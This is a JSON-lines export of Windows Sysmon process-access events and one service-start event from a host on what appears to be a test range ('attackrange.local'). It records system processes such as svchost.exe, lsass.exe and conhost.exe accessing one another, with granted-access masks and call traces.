{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.313\r\nSourceProcessGUID: {A837DB8D-01B6-5F25-0000-001055860100}\r\nSourceProcessId: 2416\r\nSourceThreadId: 2472\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001049400100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.313","SourceProcessGUID":"{A837DB8D-01B6-5F25-0000-001055860100}","SourceProcessId":"2416","SourceThreadId":"2472","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001049400100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00103D410100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nTargetProcessId: 2096\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","TargetProcessId":"2096","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76814,"ProcessID":856,"ThreadID":940,"Channel":"System","Message":"The nxlog service entered the running state.","param1":"nxlog","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.547\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.547","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.563\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.563","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.563\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.563","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
